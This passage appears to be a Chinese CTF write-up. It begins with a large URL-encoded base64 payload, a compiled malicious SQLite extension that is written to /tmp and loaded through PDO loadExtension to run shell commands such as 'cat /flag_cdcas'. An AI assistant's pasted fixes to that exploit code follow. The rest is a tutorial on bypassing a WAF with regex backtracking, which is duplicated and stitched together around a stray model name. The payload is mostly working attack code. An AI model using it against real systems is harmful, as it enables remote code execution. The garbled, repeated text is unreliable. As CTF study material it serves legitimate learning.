AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvdG1wLzEudHh0AHIADQoAARsDOywAAAAEAAAAEPD%2F%2F0gAAACA8P%2F%2FcAAAAJDw%2F%2F%2BIAAAAqfH%2F%2F6AAAAAAAAAAFAAAAAAAAAABelIAAXgQARsMBwiQAQAAJAAAABwAAADA7%2F%2F%2FcAAAAAAOEEYOGEoPC3cIgAA%2FGjoqMyQiAAAAABQAAABEAAAACPD%2F%2FxAAAAAAAAAAAAAAABQAAABcAAAAAPD%2F%2F2AAAAAAAAAAAAAAABwAAAB0AAAAAfH%2F%2FzgBAAAARQ4QhgJDDQYDLwEMBwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsBEAAAAAAABwEQAAAAAAAAEAAAAAAAAAqQAAAAAAAAAMAAAAAAAAAAAQAAAAAAAADQAAAAAAAAD0EgAAAAAAABkAAAAAAAAACD4AAAAAAAAbAAAAAAAAAAgAAAAAAAAAGgAAAAAAAAAQPgAAAAAAABwAAAAAAAAACAAAAAAAAAD1%2Fv9vAAAAAPACAAAAAAAABQAAAAAAAABQBAAAAAAAAAYAAAAAAAAAGAMAAAAAAAAKAAAAAAAAAMkAAAAAAAAACwAAAAAAAAAYAAAAAAAAAAMAAAAAAAAAAEAAAAAAAAACAAAAAAAAAJAAAAAAAAAAFAAAAAAAAAAHAAAAAAAAABcAAAAAAAAAKAYAAAAAAAAHAAAAAAAAAGgFAAAAAAAACAAAAAAAAADAAAAAAAAAAAkAAAAAAAAAGAAAAAAAAAD%2B%2F%2F9vAAAAADgFAAAAAAAA%2F%2F%2F%2FbwAAAAABAAAAAAAAAPD%2F%2F28AAAAAGgUAAAAAAAD5%2F%2F9vAAAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGD4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAMBAAAAAAAABAEAAAAAAAAFAQAAAAAAAAYBAAAAAAAABwEAAAAAAAAIAQAAAAAAAASEAAAAAAAABHQ0M6IChVYnVudHUgMTEuNC4wLTF1YnVudHUxfjIyLjA0LjIpIDExLjQuMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAABADx%2FwAAAAAAAAAAAAAAAAAAAAAMAAAAAgAOAAARAAAAAAAAAAAAAAAAAAAOAAAAAgAOADARAAAAAAAAAAAAAAAAAAAhAAAAAgAOAHARAAAAAAAAAAAAAAAAAAA3AAAAAQAZAFBAAAAAAAAAAQAAAAAAAABDAAAAAQAUABA%2BAAAAAAAAAAAAAAAAAABqAAAAAgAOALARAAAAAAAAAAAAAAAAAAB2AAAAAQATAAg%2BAAAAAAAAAAAAAAAAAACVAAAABADx%2FwAAAAAAAAAAAAAAAAAAAAABAAAABADx%2FwAAAAAAAAAAAAAAAAAAAACfAAAAAQASANAgAAAAAAAAAAAAAAAAAAAAAAAABADx%2FwAAAAAAAAAAAAAAAAAAAACtAAAAAgAPAPQSAAAAAAAAAAAAAAAAAACzAAAAAQAYAEhAAAAAAAAAAAAAAAAAAADAAAAAAQAVABg%2BAAAAAAAAAAAAAAAAAADJAAAAAAARABAgAAAAAAAAAAAAAAAAAADcAAAAAQAYAFBAAAAAAAAAAAAAAAAAAADoAAAAAQAXAABAAAAAAAAAAAAAAAAAAACfAQAAAgAKAAAQAAAAAAAAAAAAAAAAAAD%2BAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAaAQAAEgAAAAAAAAAAAAAAAAAAAAAAAAAtAQAAEgAAAAAAAAAAAAAAAAAAAAAAAABIAQAAEgAAAAAAAAAAAAAAAAAAAAAAAABbAQAAEgAAAAAAAAAAAAAAAAAAAAAAAABvAQAAEgAAAAAAAAAAAAAAAAAAAAAAAACBAQAAIAAAAAAAAAAAAAAAAAAAAAAAAACQAQAAEgAOALkRAAAAAAAAOAEAAAAAAAClAQAAEgAAAAAAAAAAAAAAAAAAAAAAAAC3AQAAIAAAAAAAAAAAAAAAAAAAAAAAAADRAQAAEQAZAFhAAAAAAAAACAAAAAAAAADdAQAAIgAAAAAAAAAAAAAAAAAAAAAAAAAAY3J0c3R1ZmYuYwBkZXJlZ2lzdGVyX3RtX2Nsb25lcwBfX2RvX2dsb2JhbF9kdG9yc19hdXgAY29tcGxldGVkLjAAX19kb19nbG9iYWxfZHRvcnNfYXV4X2ZpbmlfYXJyYXlfZW50cnkAZnJhbWVfZHVtbXkAX19mcmFtZV9kdW1teV9pbml0X2FycmF5X2VudHJ5AGV4cGxvaXQuYwBfX0ZSQU1FX0VORF9fAF9maW5pAF9fZHNvX2hhbmRsZQBfRFlOQU1JQwBfX0dOVV9FSF9GUkFNRV9IRFIAX19UTUNfRU5EX18AX0dMT0JBTF9PRkZTRVRfVEFCTEVfAF9JVE1fZGVyZWdpc3RlclRNQ2xvbmVUYWJsZQBmY2xvc2VAR0xJQkNfMi4yLjUAX19zdGFja19jaGtfZmFpbEBHTElCQ18yLjQAc3lzdGVtQEdMSUJDXzIuMi41AHN0cmNzcG5AR0xJQkNfMi4yLjUAZmdldHNAR0xJQkNfMi4yLjUAX19nbW9uX3N0YXJ0X18Ac3FsaXRlM19leHBsb2l0X2luaXQAZm9wZW5AR0xJQkNfMi4yLjUAX0lUTV9yZWdpc3RlclRNQ2xvbmVUYWJsZQBzcWxpdGUzX2FwaQBfX2N4YV9maW5hbGl6ZUBHTElCQ18yLjIuNQAALnN5bXRhYgAuc3RydGFiAC5zaHN0cnRhYgAubm90ZS5nbnUucHJvcGVydHkALm5vdGUuZ251LmJ1aWxkLWlkAC5nbnUuaGFzaAAuZHluc3ltAC5keW5zdHIALmdudS52ZXJzaW9uAC5nbnUudmVyc2lvbl9yAC5yZWxhLmR5bgAucmVsYS5wbHQALmluaXQALnBsdC5nb3QALnBsdC5zZWMALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWVfaGRyAC5laF9mcmFtZQAuaW5pdF9hcnJheQAuZmluaV9hcnJheQAuZHluYW1pYwAuZ290LnBsdAAuZGF0YQAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbAAAABwAAAAIAAAAAAAAAqAIAAAAAAACoAgAAAAAAACAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAALgAAAAcAAAACAAAAAAAAAMgCAAAAAAAAyAIAAAAAAAAkAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAEEAAAD2%2F%2F9vAgAAAAAAAADwAgAAAAAAAPACAAAAAAAAKAAAAAAAAAAEAAAAAAAAAAgAAAAAAAAAAAAAAAAAAABLAAAACwAAAAIAAAAAAAAAGAMAAAAAAAAYAwAAAAAAADgBAAAAAAAABQAAAAEAAAAIAAAAAAAAABgAAAAAAAAAUwAAAAMAAAACAAAAAAAAAFAEAAAAAAAAUAQAAAAAAADJAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAFsAAAD%2F%2F%2F9vAgAAAAAAAAAaBQAAAAAAABoFAAAAAAAAGgAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAABoAAAA%2Fv%2F%2FbwIAAAAAAAAAOAUAAAAAAAA4BQAAAAAAADAAAAAAAAAABQAAAAEAAAAIAAAAAAAAAAAAAAAAAAAAdwAAAAQAAAACAAAAAAAAAGgFAAAAAAAAaAUAAAAAAADAAAAAAAAAAAQAAAAAAAAACAAAAAAAAAAYAAAAAAAAAIEAAAAEAAAAQgAAAAAAAAAoBgAAAAAAACgGAAAAAAAAkAAAAAAAAAAEAAAAFwAAAAgAAAAAAAAAGAAAAAAAAACLAAAAAQAAAAYAAAAAAAAAABAAAAAAAAAAEAAAAAAAABsAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAhgAAAAEAAAAGAAAAAAAAACAQAAAAAAAAIBAAAAAAAABwAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAAJEAAAABAAAABgAAAAAAAACQEAAAAAAAAJAQAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAACaAAAAAQAAAAYAAAAAAAAAoBAAAAAAAACgEAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAowAAAAEAAAAGAAAAAAAAAAARAAAAAAAAABEAAAAAAADxAQAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAKkAAAABAAAABgAAAAAAAAD0EgAAAAAAAPQSAAAAAAAADQAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAACvAAAAAQAAAAIAAAAAAAAAACAAAAAAAAAAIAAAAAAAABAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAtwAAAAEAAAACAAAAAAAAABAgAAAAAAAAECAAAAAAAAAsAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAMUAAAABAAAAAgAAAAAAAABAIAAAAAAAAEAgAAAAAAAAlAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAADPAAAADgAAAAMAAAAAAAAACD4AAAAAAAAILgAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA2wAAAA8AAAADAAAAAAAAABA%2BAAAAAAAAEC4AAAAAAAAIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAOcAAAAGAAAAAwAAAAAAAAAYPgAAAAAAABguAAAAAAAAwAEAAAAAAAAFAAAAAAAAAAgAAAAAAAAAEAAAAAAAAACVAAAAAQAAAAMAAAAAAAAA2D8AAAAAAADYLwAAAAAAACgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA8AAAAAEAAAADAAAAAAAAAABAAAAAAAAAADAAAAAAAABIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAPkAAAABAAAAAwAAAAAAAABIQAAAAAAAAEgwAAAAAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAD%2FAAAACAAAAAMAAAAAAAAAUEAAAAAAAABQMAAAAAAAABAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAABAEAAAEAAAAwAAAAAAAAAAAAAAAAAAAAUDAAAAAAAAAtAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAAAAAAAAAAAAAIAwAAAAAAAAAAMAAAAAAAAcAAAAFAAAAAgAAAAAAAAAGAAAAAAAAAAJAAAAAwAAAAAAAAAAAAAAAAAAAAAAAACAMwAAAAAAAPgBAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAeDUAAAAAAAANAQAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAA%3D%3D%22%3Bfile%5Fput%5Fcontents%28%22%2Ftmp%2Fexploit%2Eso%22%2Cbase64%5Fdecode%28%24base64%5Fso%29%29%3B
然后使用burpsuite进行传值抓包随便输入一个cdcas的值我这里输入的
sql
?cdcas=phpinfo();然后抓包后重放修改cdcas的值为之前解码出的exploit.so值发送后不会有任何反应;但是此时在后台已经生成了我们写入的文件;然后我们将一下代码进行url编码
编码后得到(我这里和上面的代码不一样 我是改成了cat /flag_cacds 我们首先做一个ls -al 的编码 得到目录内容然后得知flag名称再输入cat /flag_cacds 编码后可得):
sql
file%5Fput%5Fcontents%28%22%2Ftmp%2F1%2Etxt%22%2C%22cat%20%2Fflag%5Fcdcas%20%3E%20%2Ftmp%2Ffushuling%2Etxt%22%29%3B%0A%24db%20%3D%20new%20Pdo%5CSqlite%28%27sqlite%3A%3Amemory%3A%27%29%3B%0A%24db%2D%3EsetAttribute%28PDO%3A%3AATTR%5FERRMODE%2C%20PDO%3A%3AERRMODE%5FEXCEPTION%29%3B%0A%24db%2D%3EloadExtension%28%27%2Ftmp%2Fexploit%2Eso%27%29%3B%0Aecho%20file%5Fget%5Fcontents%28%22%2Ftmp%2Ffushuling%2Etxt%22%29%3B
到这里我们的题目就已经完成了。
遇到的问题:这个题我认为最主要的就是编码我在解题过程中遇到最多的就是编码问题
一定注意编码的准确以及源代码的问题编码出现错误 我源代码之前多打了几个空格以及一个分号打成了逗号,以及->写成了>这个符号在解题过程如果出现报错很大概率就是编码有问题请大家仔细检查
最后我是询问ai辅助解决的一下是ai给我的回答:
python
1. 代码中的三个主要语法错误
你的原代码:
php
$db > setAttribute(PDO : ATTR_ERRMODE, PDO : ERRMODE_EXCEPTION);
$db > loadExtension('/tmp/exploit.so');
错误 1:箭头写错了
你写的:$db > setAttribute(...)
应该的:$db->setAttribute(...)
原因:在 PHP 中,> 是"大于"符号,-> 是对象操作符(调用方法或属性)。
错误 2:作用域分隔符写错了
你写的:PDO : ATTR_ERRMODE
应该的:PDO::ATTR_ERRMODE
原因:在 PHP 中,: 有点像三元运算符,而 :: 才是访问类常量的正确符号。
错误 3:DSN 连接字符串有空格
你写的:new Pdo\Sqlite('sqlite : memory:')
应该的:new PDO('sqlite::memory:') (注意去掉了空格,且标准类名是 PDO)
2. 修正后的代码
你可以复制这段代码替换掉你原来的部分:
// 1. 修正了 PDO 的实例化语法,去掉了多余的空格和错误的类名写法
$db = new PDO('sqlite::memory:');
// 2. 修正了 -> 符号
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// 3. 尝试加载扩展(前提是驱动存在,且 exploit.so 路径正确)
$db->loadExtension('/tmp/exploit.so');
// 你的文件操作部分(注意:这只是把命令写进文件,并没有执行它)
file_put_contents("/tmp/1.txt","whoami > /tmp/fushuling.txt");
echo file_get_contents("/tmp/fushuling.txt");我根据他给我的解决方案顺利解决了编码问题
如果各位还有其他解法可以跟我分享;
接下来我继续讲解SQL注入利用正则回溯绕过WAF详解
一、核心原理
1. 正则表达式回溯机制
sql
正则表达式引擎匹配原理(NFA - 非确定性有限自动机)
正则: .*?abc
输入: aaaaaaaaabc
匹配过程(简化):
┌─────────────────────────────────────────────────────────┐
│ 尝试1: a -> 不匹配abc -> 回溯 │
│ 尝试2: aa -> 不匹配abc -> 回溯 │
│ 尝试3: aaa -> 不匹配abc -> 回溯 │
│ ...继续回溯... │
│ 尝试N: aaaaaaaa -> 匹配abc -> 成功! │
└─────────────────────────────────────────────────────────┘2. PHP PCRE 回溯限制
sql
<?php
// PHP默认配置
echo ini_get('pcre.backtrack_limit'); // 默认值: 1000000 (100万)
// 当回溯次数超过限制时
$result = preg_match($pattern, $evil_input);
// 返回值:
// 1 = 匹配成功
// 0 = 匹配失败
// false = 发生错误(包括回溯超限)⚠️ 这是关键!二、漏洞产生的原因
有漏洞的WAF代码
sql
<?php
// ❌ 错误的WAF实现
function waf($input) {
// 检测SQL注入关键词
$pattern = '/select|union|insert|update|delete|drop|truncate|exec/i';
if (preg_match($pattern, $input)) {
return false; // 检测到攻击
}
return true; // 放行
}
// 问题分析:
// preg_match() 返回值:
// 1 -> if(1) -> true -> 拦截 ✓
// 0 -> if(0) -> false -> 放行 ✓
// false -> if(false) -> false -> 放行 ⚠️ 这里有问题!三、攻击原理图解
sql
┌──────────────────────────────────────────────────────────────────┐
│ 正则回溯绕过WAF攻击流程 │
├──────────────────────────────────────────────────────────────────┤
│ │
│ 攻击者构造 Payload │
│ │ │
│ ▼ │
│ ┌─────────────────────────────────────────────┐ │
│ │ SQL注入语句 + 大量填充字符(触发回溯) │ │
│ │ 例: "union select" + "a"*1000000 │ │
│ └─────────────────────────────────────────────┘ │
│ │ │
│ ▼ │
│ ┌─────────────────────────────────────────────┐ │
│ │ WAF 正则检测 │ │
│ │ preg_match('/union|select/i', $input) │ │
│ └─────────────────────────────────────────────┘ │
│ │ │
│ ▼ │
│ ┌─────────────────────────────────────────────┐ │
│ │ 正则引擎开始回溯... │ │
│ │ 回溯次数: 1, 2, 3 ... 1000000+ │ │
│ │ 超过 pcre.backtrack_limit! │ │
│ └─────────────────────────────────────────────┘ │
│ │ │
│ ▼ │
│ preg_match() 返回 false (不是0!) │
│ │ │
│ ▼ │
│ if(false) 条件不成立 → WAF放行 → SQL注入成功! │
│ │
└──────────────────────────────────────────────────────────────────┘- 在代码层面设置正则执行的超时时间(例如在 PHP 中使用
pcre.backtrack_limit,在 .NET 中设置MatchTimeout)。
-
使用非回溯引擎:
- 使用基于 DFA(确定性有限自动机) 的正则引擎(如 Google 的 re2 库)。DFA 引擎的时间复杂度是线性的 O(n)O(n),不受输入字符串复杂度的影响,从根本上杜绝了正则回溯攻击。
总结
利用正则回溯绕过 WAF,本质上是一种利用资源消耗迫使安全设备"放弃检查"的侧信道攻击。了解这一机制有助于编写更高效、更安全的检测规则,并正确配置安全设备的故障处理策略。
claude-opus-4-5-20251101-thinking-32k
SQL注入利用正则回溯绕过WAF详解
一、核心原理
1. 正则表达式回溯机制
text
正则表达式引擎匹配原理(NFA - 非确定性有限自动机)
正则: .*?abc
输入: aaaaaaaaabc
匹配过程(简化):
┌─────────────────────────────────────────────────────────┐
│ 尝试1: a -> 不匹配abc -> 回溯 │
│ 尝试2: aa -> 不匹配abc -> 回溯 │
│ 尝试3: aaa -> 不匹配abc -> 回溯 │
│ ...继续回溯... │
│ 尝试N: aaaaaaaa -> 匹配abc -> 成功! │
└─────────────────────────────────────────────────────────┘2. PHP PCRE 回溯限制
PHP
<?php
// PHP默认配置
echo ini_get('pcre.backtrack_limit'); // 默认值: 1000000 (100万)
// 当回溯次数超过限制时
$result = preg_match($pattern, $evil_input);
// 返回值:
// 1 = 匹配成功
// 0 = 匹配失败
// false = 发生错误(包括回溯超限)⚠️ 这是关键!二、漏洞产生的原因
有漏洞的WAF代码
PHP
<?php
// ❌ 错误的WAF实现
function waf($input) {
// 检测SQL注入关键词
$pattern = '/select|union|insert|update|delete|drop|truncate|exec/i';
if (preg_match($pattern, $input)) {
return false; // 检测到攻击
}
return true; // 放行
}
// 问题分析:
// preg_match() 返回值:
// 1 -> if(1) -> true -> 拦截 ✓
// 0 -> if(0) -> false -> 放行 ✓
// false -> if(false) -> false -> 放行 ⚠️ 这里有问题!三、攻击原理图解
text
┌──────────────────────────────────────────────────────────────────┐
│ 正则回溯绕过WAF攻击流程 │
├──────────────────────────────────────────────────────────────────┤
│ │
